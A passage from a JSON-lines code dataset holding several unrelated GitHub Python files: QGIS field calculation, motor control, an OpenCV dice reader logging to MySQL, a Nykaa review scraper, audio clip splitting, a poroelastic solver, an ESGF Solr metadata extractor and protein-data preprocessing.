outputs['KalkulatorPl']['OUTPUT']]\n\n\nclass OcenyPlatow:\n def __init__(self):\n self.prefix = []\n self.paths = []\n #self.conte\n\n def licz_oceny(self, layerpath, context = QgsProcessingContext()):\n # Kalkulator pól\n outputs = {}\n alg_params = {\n 'FIELD_LENGTH': 2,\n 'FIELD_NAME': 'ocena',\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 1, # liczba całkowita\n 'FORMULA': '''case when 1=1 then case when \"stan\" like\\'%U1%\\' then case when \"procent\" = 0 then 0 else case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end end else case when \"stan\" like\\'%U2%\\' then case when \"procent\" = 0 then 0 else case when \"procent\" < 20 then -2 else -3 end end else case when \"procent\" = 0 then 0 else case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end end end end else case when 1=0 then case when \"stan\" like\\'%U1%\\' then case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end else case when \"stan\" like\\'%U2%\\' then case when \"procent\" < 20 then -2 else -3 end else case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end end end end end''',\n 'INPUT': layerpath,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['KalkulatorPl'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n return [context, outputs['KalkulatorPl']['OUTPUT']]\n\n\n\n # print(self.prefix)\n # print(self.paths)","repo_name":"kamildrejer/oceny","sub_path":"oceny_core.py","file_name":"oceny_core.py","file_ext":"py","file_size_in_byte":32668,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12259998281","text":"import time\nimport tmotorCAN\nimport numpy as np\nimport channel_config\nfrom matplotlib import pyplot as plt\n\nch0 = channel_config.start_channel()\n\nid_1 = 1\nid_2 = 2\n\n# Delta is how much the vertical is offset from the actual zero of the motor\ndelta_1 = 0\ndelta_2 = 0\n\n#Makes motor come to centre position\n\nt_in = 0\np_in = 0\n\ninit_time = time.time()\n\nmotor = tmotorCAN.tmotor(1, 'ak80-64')\n\nwhile True:\n\n current_time = time.time() - init_time\n p_out, v_out, t_out = motor.attain(delta_1 + p_in, 0, t_in, 50, 5)\n \n #Note: without load: A = 10, with load: A = 18\n A = 10\n \n t_in = A * np.sin(p_in)\n p_in = p_out \n","repo_name":"plutoincharm/me","sub_path":"gravity_compensation.py","file_name":"gravity_compensation.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3354172157","text":"import datetime\r\nimport mysql.connector\r\nfrom getpass import getpass\r\nfrom mysql.connector import connect, Error\r\nimport cv2\r\nimport numpy as np\r\nfrom collections import deque\r\n \r\ntoday = datetime.datetime.today() #Время\r\nmin_threshold = 10 # эти значения используются для фильтрации нашего детектора.\r\nmax_threshold = 200 # они могут быть изменены в зависимости от расстояния до камеры, угла наклона камеры, ...\r\nmin_area = 100 # ... фокус, яркость и т.д.\r\nmin_circularity = 0.3\r\nmin_inertia_ratio = 0.5\r\n \r\ncap = cv2.VideoCapture(0) # '0' - это идентификатор веб-камеры. обычно это 0/1/2/3 / и т.д. \"cap\" - это видеообъект.\r\ncap.set(15, -4) # '15' ссылается на экспозицию видео. '-4' устанавливает ее.\r\n \r\ntemp=0\r\ncounter = 0 # скрипт будет использовать счетчик для обработки кадров в секунду.\r\nreadings = deque([0, 0], maxlen=10) # списки используются для отслеживания количества пунктов.\r\ndisplay = deque([0, 0], maxlen=10)\r\n \r\ntry:\r\n with connect(\r\n host=\"0.0.0.0\",\r\n user=input(\"Имя пользователя: \"),\r\n password=getpass(\"Пароль: \"),\r\n database=\"randomizer\",\r\n ) as connection:\r\n print(connection)\r\nexcept Error as e:\r\n print(e)\r\n\r\nwhile True:\r\n ret, im = cap.read() # 'im' будет кадром из видео.\r\n \r\n params = cv2.SimpleBlobDetector_Params() # объявление параметры фильтра.\r\n params.filterByArea = True\r\n params.filterByCircularity = True\r\n params.filterByInertia = True\r\n params.minThreshold = min_threshold\r\n params.maxThreshold = max_threshold\r\n params.minArea = min_area\r\n params.minCircularity = min_circularity\r\n params.minInertiaRatio = min_inertia_ratio\r\n \r\n detector = cv2.SimpleBlobDetector_create(params) # создайте объект детектора больших двоичных объектов.\r\n\r\n keypoints = detector.detect(im) # ключевые точки - это список, содержащий обнаруженные двоичные объекты.\r\n \r\n # здесь мы рисуем ключевые точки на рамке.\r\n im_with_keypoints = cv2.drawKeypoints(im, keypoints, np.array([]), (0, 0, 255),\r\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\r\n \r\n cv2.imshow(\"Dice Reader\", im_with_keypoints) # отображает рамку с добавленными ключевыми точками.\r\n \r\n if counter % 10 == 0: # вводите этот блок каждые 10 кадров.\r\n reading = len(keypoints) # 'reading' подсчитывает количество ключевых точек (pips).\r\n readings.append(reading) # запишите показания из этого кадра.\r\n \r\n if readings[-1] == readings[-2] == readings[-3]: # если последние 3 показания совпадают...\r\n display.append(readings[-1]) # ... тогда у нас есть достоверное чтение.\r\n \r\n # если последнее допустимое значение изменилось, и оно отличается от нуля, то выведите его.\r\n if display[-1] != display[-2] and display[-1] != 0:\r\n msg = f\"{display[-1]}\\n****\"\r\n print(msg)\r\n a=today.strftime(\"%d/%m/%Y\") \r\n b=today.strftime(\"%H.%M.%S\")\r\n results = \"\"\"\r\n INSERT INTO results (№_генерации, Дата, Время, Результат)\r\n VALUES\r\n (temp, a, b, msg),\r\n \"\"\"\r\n temp+= 1\r\n counter += 1\r\n with connection.cursor() as cursor:\r\n cursor.execute(results)\r\n connection.commit()\r\n \r\n if cv2.waitKey(1) & 0xff == 27: # press [Esc] to exit.\r\n break\r\n \r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"SemOr14/randomayzer","sub_path":"grjry.py","file_name":"grjry.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3533388115","text":"from bs4 import BeautifulSoup as bs\nfrom selenium import webdriver\nimport pymongo\nfirefox_options = webdriver.FirefoxOptions()\nfirefox_options.add_argument('--no-sandbox')\nfirefox_options.add_argument('--headless')\nfirefox_options.add_argument('window-size=1920,1080')\nfirefox_options.add_argument('--disable-gpu')\ndriver = webdriver.Firefox(options=firefox_options)\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef nykaa_reviews():\n search_string = input(\"Enter the product name to be searched: \")\n input_product = search_string.replace(\" \",\"%20\") # obtaining the input_product\n reviews = []\n try:\n dbConn = pymongo.MongoClient(\"mongodb://localhost:27017/\") # opening a connection to Mongo\n db = dbConn.crawlerDB # connecting to the database called crawlerDB\n a = db[search_string].find() # searching the collection with the name same as the keyword\n\n if a.count() > 0: # if there is a collection with searched keyword and it has records in it\n for i in a:\n reviews.append(i)\n return reviews # show the results to user\n else:\n nykaa_url = \"https://www.nykaa.com/search/result/?ptype=search&q=\" + input_product # preparing the URL to search the product on nykaa\n driver.get(nykaa_url) #using gecko driver to get the html of nykaa webpage\n driver.implicitly_wait(30)\n source = driver.page_source\n html = bs(source, \"html.parser\") # parsing webpage as html\n bigboxes = html.findAll(\"div\", {\"class\": \"card-wrapper-container col-xs-12 col-sm-6 col-md-4\"}) # seacrhing for appropriate tag to redirect to the product link\n for i in bigboxes:\n if 'tip-tile' in i.div.div['class']: \n bigboxes.remove(i) # removing unnecessary boxes which include ads \n for box in bigboxes:\n productLink = \"https://www.nykaa.com\" + box.div.a['href'] # extracting the actual product link\n driver.get(productLink) # using driver again to get the html of specific product page\n driver.implicitly_wait(30)\n source = driver.page_source\n prod_html = bs(source, \"html.parser\") # parsing the product page as HTML\n prod_name = prod_html.find_all('h1', {'class': \"product-title\"}) #finding the product name\n prod_name = prod_name[0].text \n commentboxes = prod_html.find_all('div', {'class': \"col-md-12\"}) # finding the HTML section containing the customer comments\n del commentboxes[0:3] # deleting unnecesaary things\n\n table = db[search_string] # creating a collection with the same name as search string.\n for comment in commentboxes:\n try:\n name = comment.find_all('span', {'class': \"reviewer-name\"})[0].text # finding reviewer name\n except:\n name = \"no name\"\n try:\n header = comment.header.find_all('h4')[0].text # finding comment heading\n except:\n header = \"no header\"\n try:\n rating = comment.find('meta',{'itemprop':'ratingValue'}) # finding rating value given by the reviewer\n x = rating[\"content\"] if rating else None\n except:\n x = \"no rating\"\n try:\n review = comment.find('meta',{'itemprop': 'description'}) # finding comment dexcription\n description = review[\"content\"] if review else None\n except:\n description = \"no description\"\n mydict = {\"Product\": prod_name, \"Name\": name, \"Rating\": x, \"CommentHead\": header,\"Comment\": description} # combining all the information in a dictionary\n y = table.insert_one(mydict) #insertig the dictionary containing the review comments to the collection\n reviews.append(mydict) # appending the comments to the review list\n return reviews\n except BaseException as e:\n return 'something is wrong' \n \nnykaa_reviews() ","repo_name":"payal-28/Review-Scraper","sub_path":"scraper/nykaa_scraper.py","file_name":"nykaa_scraper.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34637925193","text":"import engine\nimport math\nimport csv\nimport sys\nimport util\nimport defaultlist\nfrom urllib import parse, request\nimport hw2\n\n\ndef load_diseases():\n disease_list = list()\n with open('disease_list_final.txt') as f:\n lines = f.readlines()\n for l in lines:\n disease_list.append(l)\n return disease_list\n\n\ndisease_list = load_diseases()\ndisease_vector = util.load_final_vector()\nprint(disease_vector[0])\n\n\ndef lookup():\n '''q_to_eq[index of question] = equivalence class indices'''\n q_to_eq = []\n with open('quest.csv') as f:\n read = csv.reader(f, delimiter=',')\n for row in read:\n q_to_eq.append(row[0])\n f.close()\n return q_to_eq\n\n\ndef user_inp(inp):\n '''Converts the string command line argument into normalized weights'''\n inp_list = inp[1:-1].split(',') # Note all elements are STRINGs\n assert (len(inp_list)==29)\n norm_inp = []\n score4 = [0, 0.33333, 0.66666, 1] # scoring scale for 4 options\n score2 = [0, 1] # scoring scale for 2 options\n for n in range(25): # 25 questions with 4 options\n norm_inp.append(score4[int(inp_list[n])])\n for n in range(4):\n norm_inp.append(score2[int(inp_list[25 + n])])\n return norm_inp\n\n\ndef cosine_sim(x, y):\n '''\n Computes the cosine similarity between two sparse term vectors represented as dictionaries.\n '''\n sum = 0\n\n for idx, num_x in enumerate(x):\n num_y = y[idx]\n sum+=num_x*num_y\n sqrt_sum_x = 0\n sqrt_sum_y = 0\n for num_x in x:\n sqrt_sum_x += num_x**2\n norm_x = math.sqrt(num_x)\n for num_y in y:\n sqrt_sum_y += num_y**2\n norm_y = math.sqrt(num_y)\n sim = sum/(norm_x*norm_y + 1)\n return sim\n\n\ndef main():\n if len(sys.argv) == 1:\n raise Exception('Missing command line argument(user input). Exitting.')\n inp_arr = sys.argv[1]\n q_eq = lookup() # lookup table\n norm_inp = user_inp(inp_arr)\n res = [x-x for x in range(127)]\n # n = question number\n # q_eq[n] = [equivalence classes corresponding to q n]\n for n in range(29):\n q_eq[n] = q_eq[n].split(',')\n for eq in q_eq[n]: # each eq class corresponding to q n\n if (eq.rstrip() !=''):\n res[int(eq)] += norm_inp[n]\n similarity = list()\n for idx, v in enumerate(disease_vector):\n similarity.append(cosine_sim(v, res))\n val, idx = max((val, idx) for (idx, val) in enumerate(similarity))\n disease_name = disease_list[idx]\n print(disease_name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DiliSimon/HopHacks19","sub_path":"query_engine.py","file_name":"query_engine.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23847781225","text":"import os\nimport argparse\nimport json\nimport glob\nimport pandas as pd\nfrom tqdm import tqdm\nfrom more_itertools import pairwise\nfrom pydub import AudioSegment\nfrom pydub.effects import normalize\n\nDATASET_FOLDER = \"data/datasets/ChihuahuaDoTrump\"\nBIT_RATE = \"32k\"\nTARGET_SAMPLE_RATE = 22050\n\n\ndef fix_durations(subtitles_list):\n \"\"\"Fix duration in subtitles json\n\n Args:\n subtitles_list: List of dictionaries with subtitle info\n\n Returns:\n [list(dict)]: Fixed list of dictionaries\n \"\"\"\n for s1, s2 in pairwise(subtitles_list):\n s1['dur'] = str(float(s2['start']) - float(s1['start']))\n return subtitles_list\n\n\ndef split_fragments(text_file, audio_file, data_out, init_uid):\n \"\"\"Create the pairs phrases/transcription in the dataset format\n from given audio/text files\n\n Args:\n text_file (str): Path to text file\n audio_file (str): Path to audio file\n data_out (str): Path to dataset output\n init_uid (int): Initial value for unique identifier\n\n Returns:\n metadata: Dataframe with all info of the dataset\n uid (int): Last used unique identifier\n \"\"\"\n # Load subtitle\n text = json.load(open(text_file, encoding='utf8'))\n fixed_text = fix_durations(text['original'])\n\n # Load sound\n sound = AudioSegment.from_file(audio_file)\n transcriptions = []\n ids = []\n uid = init_uid\n # Splitting by text sentence\n for sentence in fixed_text:\n # silence = AudioSegment.silent(duration=100)\n start = int(float(sentence['start']) * 1000) - 300\n end = int(float(sentence['start']) * 1000 +\n float(sentence['dur']) * 1000)\n # Add 100ms silent around audio\n fragment = normalize(sound[start:end])\n # Check audio length\n if (fragment.duration_seconds > 20) or (fragment.duration_seconds < .4):\n continue\n uid += 1\n str_id = \"{:0>6}\".format(uid)\n ids.append(str_id)\n transcriptions.append(sentence['text'])\n # Frame rate\n fragment = fragment.set_frame_rate(TARGET_SAMPLE_RATE).set_channels(1)\n fragment.export(os.path.join(data_out, \"wav\", str_id + \".wav\"),\n format=\"wav\", bitrate=BIT_RATE)\n\n # Create dataset\n metadata = pd.DataFrame(columns=[\"id\", \"transcription\"])\n metadata[\"id\"] = ids\n metadata[\"transcription\"] = transcriptions\n\n return (metadata, uid)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--dataset\",\n help=\"Folder contaning the audio/text files downloaded\",\n default=DATASET_FOLDER)\n args = parser.parse_args()\n\n # Garantes folder exists\n audio_path = os.path.join(args.dataset, \"raw\", \"audio\")\n os.makedirs(audio_path, exist_ok=True)\n os.makedirs(os.path.join(args.dataset, \"wav\"), exist_ok=True)\n # List of Dataframes\n dfs = []\n uid = 0\n # Source\n audio_source = glob.glob(audio_path + \"/*\")\n pbar = tqdm(audio_source, desc=\"Processing files...\")\n total = 0\n for audio_file in pbar:\n file_name = os.path.basename(audio_file)\n # Check if subtitle exists\n file_no_ext = file_name.split(\".\")[0]\n text_file = os.path.join(\n args.dataset, \"raw\", \"text\", file_no_ext + \".json\")\n if os.path.exists(text_file):\n df, uid = split_fragments(text_file, audio_file, args.dataset, uid)\n total += df.shape[0]\n pbar.set_description(\n f\"{file_name} added {df.shape[0]}/{total} fragments to dataset\")\n dfs.append(df)\n # Ignore audio without text\n else:\n pbar.set_description(f\"Ignoring {file_name} no subtitles found.\")\n continue\n dataset = pd.concat(dfs).reset_index()\n dataset.to_csv(os.path.join(\n args.dataset, os.path.basename(os.path.normpath(args.dataset)) + \".csv\"),\n encoding='utf8')\n","repo_name":"Fernandohf/GenocidalVoice","sub_path":"processing/create_clips.py","file_name":"create_clips.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18291562013","text":"import numpy as np\nfrom parameterSet import *\n\nclass uniformGrid:\n def __init__(self):\n self.parameter = parameter()\n self.M = self.parameter.M\n self.T = self.parameter.T\n self.dr = (self.parameter.r_s-self.parameter.r_v)/(self.M+1)\n self.dt = self.parameter.dt\n self.r_grid = np.linspace(self.parameter.r_v, self.parameter.r_s, self.M+1)\n self.t_grid = np.arange(0, self.T, self.dt)\n self.u0 = None\n self.p0 = None\n self.u_dummy_coefficient_1 = 2*self.parameter.G*(1-self.parameter.nu)/self.parameter.rho/(1-2*self.parameter.nu)\n self.u_dummy_coefficient_2 = self.parameter.alpha/self.parameter.rho\n\n self.u_dot_coefficient = self.parameter.d**4*np.pi/128/self.parameter.mu/self.parameter.L\n def IC(self, impact = True):\n \n if impact:\n # self.impactFunction = impactFunction()\n k = np.floor(self.M/3.5)\n amp = 0.004\n self.u_dot = amp*np.sin(100*self.r_grid*np.pi)\n \n self.u_dot[:int((self.M-np.floor(k/2)))] = 0\n else:\n self.u_dot = np.zeros(self.M+1)\n # print(len(self.u_dot))\n\n\n def central_diff(self, array, diff_order, dx): # only in interior points, ie, if len(array) = N we only consider array[2::]-array[0::-2]\n if diff_order == 1:\n return (array[2::]-array[0:-2])/(2*dx)\n elif diff_order == 2:\n return (array[2::]-2*array[1:-1]+array[0:-2])/(dx**2)\n\n def update_u(self): # time\n self.u1 = self.u_dot*self.dt+self.u0 \n self.u1[-1] = 0\n \n\n def update_u_dummy(self): # We only consider interior points why consider u1\n self.u_dummy = np.zeros(self.M+1)\n self.u_dummy[1:-1] = self.u_dummy_coefficient_1\\\n *(self.central_diff(self.u0*self.r_grid, 2, self.dr)/self.r_grid[1:-1]\\\n -(2/(self.r_grid[1:-1]**2))*self.u0[1:-1])\\\n -self.u_dummy_coefficient_2*self.central_diff(self.p0, 1, self.dr)\n \n self.u_dummy[0] = self.u_dummy_coefficient_1\\\n *(np.sum(np.array([-2, 5, -4, 1])*self.r_grid[0:4]*self.u0[0:4])/(-1*self.dr**2)/self.r_grid[0]\\\n -2/(self.r_grid[0]**2)*self.u0[0])\\\n -self.u_dummy_coefficient_2*(-3*self.p0[0]+4*self.p0[1]-self.p0[2])/2/self.dr\n \n self.u_dummy[-1] = 0\n \n \n def update_p(self):\n \n p1 = np.zeros(self.M+1)\n p1[1:-1] = self.p0[1:-1]+\\\n self.dt/(self.parameter.S)*\\\n (-1*self.parameter.alpha*(self.central_diff(self.u_dot*self.r_grid**2, 1, self.dr)/self.r_grid[1:-1])\\\n +self.parameter.k*(self.central_diff(self.p0*self.r_grid, 2, self.dr)/self.r_grid[1:-1])\\\n +self.parameter.k*self.parameter.rho*(self.central_diff(self.u_dummy*(self.r_grid)**2, 1, self.dr)/self.r_grid[1:-1]**2))\n \n p1[0] = 2*self.parameter.G/(1-2*self.parameter.nu)/(self.parameter.alpha-1)*\\\n ((1-self.parameter.nu)*(-3*self.u1[0]+4*self.u1[1]-self.u1[2])/2/self.dr+2*self.parameter.nu/self.r_grid[0]*self.u1[0])\n \n p1[-1] = self.parameter.p_v+self.parameter.mu*self.parameter.R*self.parameter.Q_obs\n self.p1 = p1\n \n def update_u_dot(self):\n \n u_dot_1 = np.zeros(self.M+1)\n u_dot_1[1:-1] = self.u_dot[1:-1]+\\\n self.dt*(self.u_dummy_coefficient_1\\\n *(self.central_diff(self.u1*self.r_grid, 2, self.dr)/self.r_grid[1:-1]-2/(self.r_grid[1:-1]**2)*self.u1[1:-1])\\\n -self.u_dummy_coefficient_2*self.central_diff(self.p1, 1, self.dr)\n )\n u_dot_1[0] = 1/4/(np.pi*(self.r_grid[0]+self.u1[0])**2)\\\n *((self.parameter.Q_prod-(self.u_dot_coefficient)*(self.p1[0]-self.p1[-1])\\\n +4*self.parameter.k*np.pi*(self.r_grid[0]+self.u1[0])**2\\\n *(-3*self.p1[0]+4*self.p1[1]-self.p1[2])/2/self.dr))\n \n u_dot_1[-1] = 0\n self.u_dot_1 = u_dot_1\n\n ","repo_name":"putintostyle/poroelastic-model","sub_path":"uniformGrid.py","file_name":"uniformGrid.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17593848466","text":"# encoding: utf-8\n\"\"\"\n.. _regex:\n\nRegex\n------\n\"\"\"\n__author__ = \"Richard Smith\"\n__date__ = \"27 May 2021\"\n__copyright__ = \"Copyright 2018 United Kingdom Research and Innovation\"\n__license__ = \"BSD - see LICENSE file in top-level package directory\"\n__contact__ = \"richard.d.smith@stfc.ac.uk\"\n\n\nimport logging\nimport os\n\n# Python imports\nfrom functools import lru_cache\n\nimport requests\n\nfrom stac_generator.core.decorators import (\n accepts_output_key,\n accepts_postprocessors,\n accepts_preprocessors,\n expected_terms_postprocessors,\n)\nfrom stac_generator.core.processor import BaseExtractionMethod\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass ESGFSolrExtract(BaseExtractionMethod):\n \"\"\"\n Extracts metadata from files held in ESGF Solr.\n\n Configuration options:\n\n .. list-table::\n :header-rows: 1\n\n * - Option\n - Value Type\n - Description\n * - ```solr_kwargs```\n - ```dict```\n - Parameters to pass into the request URL to the Solr index\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n session_kwargs = getattr(self, \"solr_kwargs\")\n self.index = session_kwargs.get(\"index_node\")\n self.core = session_kwargs.get(\"solr_core\", \"files\")\n\n @staticmethod\n def format_item(solr_item):\n \"\"\"\n Solr returns metadata as lists, convert the single item\n list to item.\n \"\"\"\n if isinstance(solr_item, list) and len(solr_item) == 1:\n return solr_item[0]\n return solr_item\n\n def get_metadata(self, path, index, core):\n \"\"\"\n Send a request to Solr to get metadata from path id.\n \"\"\"\n url = f\"http://{index}/solr/{core}/select\"\n search_params = {\n \"indent\": \"on\",\n \"q\": f\"id:{path}\",\n \"wt\": \"json\",\n \"rows\": 1,\n \"sort\": \"id asc\",\n \"cursorMark\": \"*\",\n }\n\n resp = requests.get(url, search_params).json()\n docs = resp[\"response\"][\"docs\"][0]\n metadata = dict((k, self.format_item(v)) for k, v in docs.items())\n return metadata\n\n def extract_timestamp(self, metadata: dict):\n self.info[\"file_last_modified_timestamp\"] = metadata.pop(\"timestamp\")\n\n def extract_size(self, metadata: dict):\n self.info[\"size\"] = metadata.pop(\"size\")\n\n def extract_checksum(self, metadata: dict):\n self.info[\"checksum\"] = metadata.pop(\"checksum\")\n self.info[\"checksum_type\"] = metadata.pop(\"checksum_type\")\n\n def extract_filename(self, metadata: dict):\n filename = metadata.pop(\"title\")\n self.info[\"filename\"] = filename\n self.info[\"extension\"] = os.path.splitext(filename)[1]\n\n def extract_properties(self, metadata: dict):\n file_id = metadata.pop(\"id\")\n self.info[\"properties\"] = metadata\n self.info[\"properties\"][\"file_id\"] = file_id\n\n def extract_url(self, metadata: dict):\n urls = metadata.pop(\"url\")\n self.info[\"location\"] = urls\n hrefs = {method: url for (url, _, method) in [link.split(\"|\") for link in urls]}\n\n self.info[\"href\"] = hrefs.pop(\"HTTPServer\")\n for method, url in hrefs.items():\n self.info[f\"{method}_url\"] = url\n\n def extract_ids(self, metadata: dict):\n self.info[\"master_id\"] = metadata.pop(\"master_id\")\n self.info[\"instance_id\"] = metadata.pop(\"instance_id\")\n self.info[\"tracking_id\"] = metadata.pop(\"tracking_id\")\n\n @staticmethod\n def remove_fields(metadata: dict):\n \"\"\"\n Remove metadata that are not mapped to STAC\n \"\"\"\n keys = [\"type\", \"version\", \"_timestamp\", \"score\", \"_version_\"]\n for key in keys:\n try:\n metadata.pop(key)\n except KeyError:\n pass\n\n @lru_cache(maxsize=3)\n def get_item_metadata(self, dataset_id) -> dict:\n \"\"\"\n Get additional metadata exclusive to the dataset level of the file.\n \"\"\"\n metadata = self.get_metadata(dataset_id, self.index, \"datasets\")\n return metadata\n\n def get_item_info(self):\n \"\"\"\n Get item information.\n \"\"\"\n dataset_id = self.info[\"properties\"][\"dataset_id\"]\n item_metadata = self.get_item_metadata(dataset_id)\n\n dataset_exclusive_keys = [\n \"access\",\n \"height_units\",\n \"height_top\",\n \"height_bottom\",\n \"instance_id\",\n \"master_id\",\n \"url\",\n ]\n\n for key in dataset_exclusive_keys:\n try:\n self.info[\"properties\"][key] = item_metadata[key]\n except KeyError:\n pass\n\n # If there is geometry data, extract and reformat into bbox\n try:\n bbox = dict(\n min_lat=item_metadata[\"south_degrees\"],\n max_lon=item_metadata[\"west_degrees\"],\n max_lat=item_metadata[\"north_degrees\"],\n min_lon=item_metadata[\"east_degrees\"],\n )\n self.info[\"properties\"].update(bbox)\n except KeyError:\n pass\n\n @accepts_output_key\n @accepts_preprocessors\n @accepts_postprocessors\n def run(self, uri: str, **kwargs) -> dict:\n\n # Transform the path back to ID form\n uri = uri.replace(\"/\", \".\")\n\n LOGGER.info(\"Extracting metadata for: %s\", uri)\n\n metadata = self.get_metadata(uri, self.index, self.core)\n\n self.extract_url(metadata)\n self.extract_size(metadata)\n self.extract_filename(metadata)\n self.extract_checksum(metadata)\n self.extract_ids(metadata)\n\n self.remove_fields(metadata)\n self.extract_properties(metadata)\n\n self.get_item_info()\n\n return self.info\n\n @expected_terms_postprocessors\n def expected_terms(self, **kwargs) -> list:\n \"\"\"\n The expected terms to be returned from running the extraction method with the given Collection Description\n :param collection_descrition: CollectionDescription for extraction method\n :param kwargs: free kwargs passed to the processor.\n :return: list\n \"\"\"\n\n return [\"esgf solar terms\"]\n","repo_name":"cedadev/stac-generator","sub_path":"stac_generator/plugins/extraction_methods/esgf_solar.py","file_name":"esgf_solar.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"16830636374","text":"import cv2\r\n\r\nimg_path = \"./mountain.jpeg\"\r\nimg = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\r\ntitle = 'IMG'\r\n\r\nx, y = 100, 100\r\n\r\ncv2.moveWindow(title, x, y)\r\ncv2.namedWindow(title, cv2.WINDOW_NORMAL)\r\ncv2.imshow(title, img)\r\n\r\nwhile True:\r\n key = cv2.waitKey(0) & 0xFF\r\n if key == ord('s'):\r\n cv2.imwrite('output_gray.jpeg', img)\r\n if key == ord('r'):\r\n # cv2.imshow(title, cv2.resize(img, (img.shape[1]*2, img.shape[0]*2)))\r\n cv2.resizeWindow(title, 20,20)\r\n if key == ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()","repo_name":"Ye0l/AI_Tello_Drone","sub_path":"cvImwrite.py","file_name":"cvImwrite.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70972646134","text":"import math\r\nimport os\r\nimport time\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport pathlib\r\n#from scipy.stats import norm as nm\r\nfrom multiprocessing import Pool\r\nimport argparse\r\nimport matplotlib.image\r\n# from .arraylize import Arraylize\r\n\r\n\r\nparser = argparse.ArgumentParser(description='manual to this script')\r\nparser.add_argument('--resolution', type=int, default='256',\r\n help='output resolution')\r\nparser.add_argument('--dataset_path', type=str, default=os.getcwd(),\r\n help='path of dataset')\r\nparser.add_argument('--output_path', type=str, default=os.getcwd()+'/processed_data',\r\n help='path of output')\r\nparser.add_argument('--dataset', type=str, default='cif_filtered',\r\n help='name of dataset folder, bc-30-1_CA|bc-30-1_chains|cif_filtered')\r\nparser.add_argument('--input_type', type=str, default='cif',\r\n help='type of input file, cif|pdb')\r\nparser.add_argument('--output_type', type=str, default='image',\r\n help='image or distance_map, images|distance_map')\r\nparser.add_argument('--axis_range', type=int, default='64',\r\n help='map range of structures, 42|64')\r\nparser.add_argument('--multi_process', type=bool, default=True,\r\n help='multi process or not')\r\nparser.add_argument('--multi_atom', type=bool, default=False,\r\n help='input all backbone atoms or CA only')\r\nparser.add_argument('--move2center', type=bool, default=True,\r\n help='relocate the center of proteins to the center of coordinate system')\r\nparser.add_argument('--redistribute', type=bool, default=False,\r\n help='redistribute the original distribution according to normal distribution')\r\nparser.add_argument('--relative_number', type=bool, default=False,\r\n help='mark dots with relative serial number')\r\nparser.add_argument('--draw_connection', type=bool, default=True,\r\n help='draw dots connection or not')\r\nparser.add_argument('--aminoacid_message', type=bool, default=True,\r\n help='mark amino acid with hydropathicity, bulkiness and flexibility or 1.')\r\nparser.add_argument('--redistribute_rate', type=float, default='1.4',\r\n help='coefficient of redistribution amplitude')\r\nargs = parser.parse_args()\r\n\r\nres = args.resolution\r\nar = args.axis_range\r\ns = ar / res # scale=axis_range/resolution\r\ninput_folder = args.dataset_path + '/' + args.dataset\r\nAMINO_ACIDS = ['ALA', 'ARG', 'ASN', 'ASP', 'CYS',\r\n 'GLN', 'GLU', 'GLY', 'HIS', 'ILE',\r\n 'LEU', 'LYS', 'MET', 'PHE', 'PRO',\r\n 'SER', 'THR', 'TRP', 'TYR', 'VAL']\r\nAA_HYDROPATHICITY_INDEX = {\r\n 'ARG': -4.5,\r\n 'LYS': -3.9,\r\n 'ASN': -3.5,\r\n 'ASP': -3.5,\r\n 'GLN': -3.5,\r\n 'GLU': -3.5,\r\n 'HIS': -3.2,\r\n 'PRO': -1.6,\r\n 'TYR': -1.3,\r\n 'TRP': -0.9,\r\n 'SER': -0.8,\r\n 'THR': -0.7,\r\n 'GLY': -0.4,\r\n 'ALA': 1.8,\r\n 'MET': 1.9,\r\n 'CYS': 2.5,\r\n 'PHE': 2.8,\r\n 'LEU': 3.8,\r\n 'VAL': 4.2,\r\n 'ILE': 4.5,\r\n}\r\nAA_BULKINESS_INDEX = {\r\n 'ARG': 14.28,\r\n 'LYS': 15.71,\r\n 'ASN': 12.82,\r\n 'ASP': 11.68,\r\n 'GLN': 14.45,\r\n 'GLU': 13.57,\r\n 'HIS': 13.69,\r\n 'PRO': 17.43,\r\n 'TYR': 18.03,\r\n 'TRP': 21.67,\r\n 'SER': 9.47,\r\n 'THR': 15.77,\r\n 'GLY': 3.4,\r\n 'ALA': 11.5,\r\n 'MET': 16.25,\r\n 'CYS': 13.46,\r\n 'PHE': 19.8,\r\n 'LEU': 21.4,\r\n 'VAL': 21.57,\r\n 'ILE': 